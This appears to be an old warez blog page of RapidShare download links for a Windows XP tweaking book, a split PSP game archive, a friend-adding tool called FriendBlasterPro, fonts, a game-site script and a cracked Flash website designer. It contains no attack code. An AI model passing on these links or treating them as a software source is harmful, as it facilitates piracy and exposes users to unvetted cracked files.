* Mines gems like unlocking hidden settings, customizing boot screens, supercharging online and program launch speed, maximizing the file system and RAM, and dumping hated features for good
* Written by the creator of TweakXP.com, a site considered Mecca for Windows hackers and trusted by more than ten million Windows XP users worldwide.


Hacking Windows XP Extreme-Tech

http://rapidshare.com/files/133633010/Hacking_20Windows_20XP_20-_20ExtremeTech.zip




Download:

http://rapidshare.com/files/63705105/PSP.Coded.Arms.Contagion.PDZ-Tavern.rar.001
http://rapidshare.com/files/63705033/PSP.Coded.Arms.Contagion.PDZ-Tavern.rar.002
http://rapidshare.com/files/63704994/PSP.Coded.Arms.Contagion.PDZ-Tavern.rar.003
http://rapidshare.com/files/63704987/PSP.Coded.Arms.Contagion.PDZ-Tavern.rar.004
http://rapidshare.com/files/63704990/PSP.Coded.Arms.Contagion.PDZ-Tavern.rar.005



friends hacking Monday, December 15, 2008




Download:
http://rapidshare.com/files/129028020/FriendBlasterPro.v10.1.0.rar

1158 Fonts Collection

1158 Fonts Collection

Download

http://rapidshare.com/files/138909243/1158.fonts.sh.rar

games



website:

http://www.mobilelaugh.com/gamesite/index.php

download:

http://rapidshare.com/files/139358352/gamesite.rar

website design




Overview:

Flash Website Design is the Flash HTML tool to help Web master design animated Flash Web sites, intros, Flash banners, Flash ads. With Flash Website Design you can create your website within 5 minuts and without any skill. The Flash Website Design enables you to create simple as well as complex Flash animations, where by you can combine different fonts and effects within a single Flash animation. Flash Website Design is very user-friendly, wide range effect templates ready for use, and you don't need any Flash/HTML or programming skills to use it. Version 1.0563 supports Flash8 shadow and blur.

Download:

http://rapidshare.com/files/139203086/flash_Website_Design_Crack.rar